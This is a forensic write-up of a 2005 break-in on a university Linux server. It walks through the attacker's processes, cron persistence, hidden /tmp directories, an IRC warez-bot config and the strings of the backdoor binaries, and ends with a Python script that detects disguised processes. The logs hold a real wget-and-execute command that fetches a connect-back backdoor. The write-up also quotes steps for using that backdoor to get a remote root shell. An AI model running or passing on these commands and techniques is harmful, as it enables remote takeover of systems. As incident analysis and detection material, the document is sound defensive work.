hacker broke into igloo.its.unimacq.edu.au on Feb 27!
-----------------------------------------------------

[root@igloo httpd]# ps -aef | grep nobody
nobody   13150     1  0 Feb27 ?        00:00:00 ./sshd
nobody   10887     1 49 11:30 ?        00:05:13 ./sshd
nobody   10888     1 49 11:30 ?        00:05:13 ./sshd
nobody   10342     1  0 Feb27 ?        00:00:00 ./sh
nobody   10402     1  0 Feb27 ?        00:00:00 /tmp/rpcd
nobody   13151     1  0 Feb27 ?        00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;cd /tmp;wget http://atomix.localroot.org/html;chmod +x /tmp/html;/tmp/html 210.238.202.150 5453

[terrence@raider Telmann]$ nslookup atomix.localroot.org
Server:         137.111.66.5
Address:        137.111.66.5#53

Non-authoritative answer:
Name:   atomix.localroot.org
Address: 69.64.34.186

[terrence@raider Telmann]$ nslookup 210.238.202.150
Server:         137.111.66.5
Address:        137.111.66.5#53

Non-authoritative answer:
150.202.238.210.in-addr.arpa        canonical name = 150.144h.202.238.210.in-addr.arpa.
150.144h.202.238.210.in-addr.arpa   name = vphone.jp.

Authoritative answers can be found from:
144h.202.238.210.in-addr.arpa       nameserver = dns7.dion.ne.jp.
144h.202.238.210.in-addr.arpa       nameserver = dns.selecom.co.jp.
dns7.dion.ne.jp                     internet address = 210.172.64.81

[root@igloo tmp]# strings html
/lib/ld-linux.so.2
libc.so.6
strcpy
printf
connect
atol
memcpy
execl
dup2
system
socket
send
memset
shutdown
gethostbyname
htons
exit
_IO_stdin_used
__libc_start_main
close
__gmon_start__
GLIBC_2.0
PTRh
QVhx
[httpd]
/bin/bash
clear
[*] sileC2Bd v1.0 connect-back backd00r
coded by Silentium of Anacron Group Italy
http://www.autistici.org/anacron-group-italy
[*] Use: sileC2Bd <host> <port>
][*][ sileC2Bd v1.0 connect-back backd00r
][*][ coded by Silentium of Anacron Group Italy
][*][ http://www.autistici.org/anacron-group-italy
0x00d34d Error, don't get host by name
0x00d34d Error, don't create socket
0x00d34d Error, don't connecting at host

[root@igloo tmp]# strings rpcd
/lib/ld-linux.so.2
libc.so.6
strcpy
waitpid
ioctl
stdout
execve
memcpy
perror
dup2
socket
select
fflush
bzero
setpgid
accept
write
kill
bind
chdir
memchr
signal
read
htonl
listen
fork
sprintf
htons
exit
_IO_stdin_used
__libc_start_main
strlen
open
vhangup
setsid
close
__gmon_start__
GLIBC_2.0
PTRh$
pqrstuvwxyzabcde
0123456789abcdef
/dev/ptmx
/dev/pty
/dev/tty
socket
bind
listen
Daemon is starting... OK, pid = %d
/dev/null
HOME=%s
Can't fork pty, bye!
/bin/sh

sileC2Bd v1.0 can be downloaded from <http://www.autistici.org/anacron-group-italy/sources.html>

How compile and use sileC2Bd
----------------------------

Step 1: gcc sileC2Bd.c -o sileC2Bd

Step 2: Run netcat in your localhost or other host, and open an arbitrary port.

./nc -l -p 7000

The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning, and source routing. Unlike telnet, nc scripts nicely, and separates error messages onto standard error instead of sending them to standard output, as telnet does with some.
-l       Is used to specify that nc should listen for an incoming connection, rather than initiate a connection to a remote host. Any hostname/IP address and port arguments restrict the source of inbound connections to only that address and source port.
-p port  Specifies the source port nc should use, subject to privilege restrictions and availability.

Step 3: Run sileC2Bd in victim host

./sileC2Bd yourhost.org 7000

And now in your shell where netcat running, is appeared the backdoor's banner, now you can execute *nix commands on victim host

root@localhost:~# nc -l -p 7000
][*][ sileC2Bd v1.0 connect-back backd00r
][*][ coded by Silentium of Anacron Group Italy
][*][ http://www.autistici.org/anacron-group-italy
id
uid=0(root) gid=0(root)

sileC2Bd is hidden
------------------

sileC2Bd's process is hidden by:

#define HIDE "[httpd]"

This string simulates an *nix process, and real name of process is hidden at ps and similar commands:

ps -waux
root      1710  0.0  0.0  1348  256 pts/3    S    06:01   0:00 [httpd]

netstat -nap --inet
tcp        0      0 66.66.66.66:34039       10.10.10.10:7000        ESTABLISHED 2429/[httpd]

[root@igloo cron]# pwd
/var/spool/cron
[root@igloo cron]# ls -al nobody
-rw-------    1 root     nobody        483 Feb 27 12:08 nobody
[root@igloo cron]# cat nobody
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (a.txt installed on Sun Feb 27 12:08:30 2005)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../.k/sshd
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../d/httpd -b /tmp/.../.../.../d/httpd.conf
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../d/mud/bin/sh
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../zb

[root@igloo ...]# pwd
/tmp/.../.../...
[root@igloo ...]# ls -al
total 20
drwxr-xr-x    4 nobody   nobody       4096 Feb 27 12:08 .
drwxr-xr-x    3 nobody   nobody       4096 Feb 27 06:32 ..
-rw-r--r--    1 nobody   nobody        304 Feb  6 15:49 a.txt
drwxr-xr-x    3 nobody   nobody       4096 Feb 27 12:08 d
drwxr-xr-x    2 nobody   nobody       4096 Feb 27 12:08 .k
[root@igloo ...]# cat a.txt
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../.k/sshd
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../d/httpd -b /tmp/.../.../.../d/httpd.conf
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../d/mud/bin/sh
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../zb

[root@igloo d]# pwd
/tmp/.../.../.../d
[root@igloo d]# ls -al
total 248
drwxr-xr-x    3 nobody   nobody       4096 Feb 27 12:08 .
drwxr-xr-x    4 nobody   nobody       4096 Feb 27 12:08 ..
-rwxr-xr-x    1 nobody   nobody     232711 Jan 18 12:50 httpd
-rw-r--r--    1 nobody   nobody       1081 Feb  6 15:41 httpd.conf
drwxr-xr-x   10 nobody   nobody       4096 Feb 27 06:32 mud
[root@igloo d]# strings httpd
...
iroffer v1.3.b09 [20040823145936] by PMG, see http://iroffer.org/
Usage: %s [-vc] [-bdkns] [-u user] [-t dir] configfile [ configfile ... ]
        -v        Print version and exit.
        -c        Generate encrypted password and exit.
        -d        Increase debug level
        -b        Go to background mode
        -k        Attempt to adjust ulimit to allow core files
        -n        No colors in foreground mode
        -s        No screen manipulation in foreground mode
        -u user   Run as user (you have to start as root).
        -t dir    Chroot to dir (you have to start as root).
...

iroffer is a software program that acts as a fileserver for IRC. It is similar to a FTP server or WEB server, but users can download files using the DCC protocol of IRC instead of a web browser.
[root@igloo d]# cat httpd.conf
user_nick [wP]-N
#channel #Warezpunks -plist 10 -pformat full
#channel #indaglo -plist 10 -pformat full
slotsmax 20
queuesize 100
pidfile .pid
#logfile /dev/.log
logstats no
logrotate weekly
statefile .state
connectionmethod direct
server ccdxf.cjb.net 6667
server ccdxf.cjb.net 6668
server ccdxf.cjb.net 6669
server ccdxf.cjb.net 7000
server ccdxf.cjb.net 7331
server kccdxf.cjb.net
channel #wp.bots -plist 20
user_realname 5,0FrEaK0,050201
user_modes +ixB
loginname wP
maxtransfersperperson 1
maxqueueditemsperperson 2
filedir /tmp/.../.../.../.a
restrictlist
restrictprivlist
restrictprivlistmsg Wait for public list in the channel or join #wP to search.
respondtochannelxdcc
downloadhost *!*@*
headline 5,0WaReZ0,05pUnKs
creditline 5,0WaReZ0,05pUnKs
adminpass t0z4.r6/Atb5o
adminhost *0201!*pjax5@*.de.comcast.net
adminhost *0201!*pjax5@xxxxx
adminhost *0201!*@*TH.EM*
adminhost *!*@*.global-dimension.org
adminhost *599!*@*SeKsI.InDiaN.Association
uploadhost *!*@*
uploaddir /tmp/.../.../.../
uploadmaxsize 6000
hideos

[root@igloo mud]# pwd
/tmp/.../.../.../d/mud
[root@igloo mud]# ls -R
.:
bin  etc  info  lib  log  man  msg  share  var

./bin:
sh

./etc:
hump  muddleftpd

./etc/muddleftpd:
muddleftpd.conf

./info:
muddleftpd.info

./lib:
muddleftpd

./lib/muddleftpd:
libauthsmb.so

./man:
man1

./man/man1:
ftpwho.1  muddleftpd.1  mudpasswd.1

./msg:

./share:
doc

./share/doc:
muddleftpd

./share/doc/muddleftpd:
cookie.txt  muddleftpd.txt  mudpasswd.txt  reference.txt  ftpcmds.txt  mudlogd.txt  README.authsmb

./var:
lock

./var/lock:
muddleftpd.scratch

Muddleftpd is a secure, lightweight and flexible FTP server originally written by Beau Kuiper. The server was designed to allow a vast number of configurations; from closely integrating with the system and using PAM to running as a non-root user with per-directory configurations. Yet it also manages to be easy to set up.
The small size of the daemon helps make it very resource efficient, yet it doesn't compromise at all in functionality. In fact it offers a number of extra features to help with security. Most noticeable is the fact that, unlike most FTP servers currently available, the daemon has no need for root privileges, therefore even if the daemon is compromised a malicious user will have no elevated access.

[root@igloo .k]# pwd
/tmp/.../.../.../.k
[root@igloo .k]# ls -al
total 44
drwxr-xr-x    2 nobody   nobody       4096 Feb 27 12:08 .
drwxr-xr-x    4 nobody   nobody       4096 Feb 27 12:08 ..
-rwxr-xr-x    1 nobody   nobody      34979 Feb 20 19:08 sshd

[root@igloo .3]# pwd
/tmp/.3
[root@igloo .3]# ls -al
total 1316
drwxr-xr-x    2 nobody   nobody       4096 Feb 27 14:04 .
drwxrwxrwt    6 root     root       897024 Mar  9 12:54 ..
-rwxr-xr-x    1 nobody   nobody     437370 Feb 25 20:53 a.out
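Both the "[httpd]" disguise described under "sileC2Bd is hidden" and the cron-started binaries living under /tmp/.../ can be picked up from /proc rather than by trusting the name ps prints. This is an added example written for this writeup, not code from the incident or from any tool it names; it reads /proc (Linux, and root is needed to resolve every process's exe link), and the SAMPLE records are constructed to mirror the report's ps and netstat output.

```python
import os
import pwd
import re
from dataclasses import dataclass

KTHREAD_RE = re.compile(r"^\[[^\]]*\]$")        # "[httpd]", "[kswapd0]", ...
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # world-writable drop zones

@dataclass
class Proc:
    pid: int
    user: str
    argv0: str         # first NUL-separated field of /proc/<pid>/cmdline
    exe: "str | None"  # readlink of /proc/<pid>/exe; None for kernel threads

def reasons(p: Proc) -> list:
    """Why this process looks suspicious; an empty list means nothing found."""
    out = []
    # Real kernel threads have an EMPTY cmdline (ps prints "[comm]" for them), so a
    # literal "[name]" in argv[0] is always a user-space binary in disguise.
    if KTHREAD_RE.match(p.argv0):
        out.append(f"argv[0] {p.argv0!r} imitates a kernel thread")
    if p.exe and p.exe.startswith(TMP_DIRS):
        out.append(f"binary runs from a world-writable directory: {p.exe}")
    if p.exe and p.exe.endswith(" (deleted)"):
        out.append("binary was unlinked after launch")
    return out

def suspicious(procs) -> list:  # (pid, user, reason) for every finding
    return [(p.pid, p.user, why) for p in procs for why in reasons(p)]

def collect_from_proc() -> list:  # live snapshot (Linux; root resolves every exe)
    procs = []
    for d in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{d}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            try:
                exe = os.readlink(f"/proc/{d}/exe")
            except OSError:                     # kernel thread, or not permitted
                exe = None
            user = pwd.getpwuid(os.stat(f"/proc/{d}").st_uid).pw_name
            procs.append(Proc(int(d), user, argv0, exe))
        except (OSError, KeyError):             # process exited, or unknown uid
            continue
    return procs

# Constructed sample modelled on the report's ps/netstat output (not captured data).
SAMPLE = [Proc(2, "root", "", None), Proc(900, "root", "/usr/sbin/sshd", "/usr/sbin/sshd"),
          Proc(2429, "nobody", "[httpd]", "/tmp/html"), Proc(10402, "nobody", "/tmp/rpcd", "/tmp/rpcd")]
```

On a live host run `suspicious(collect_from_proc())`; `suspicious(SAMPLE)` reproduces the report's findings offline, flagging the "[httpd]" process and /tmp/rpcd while leaving kthreadd and the real sshd alone.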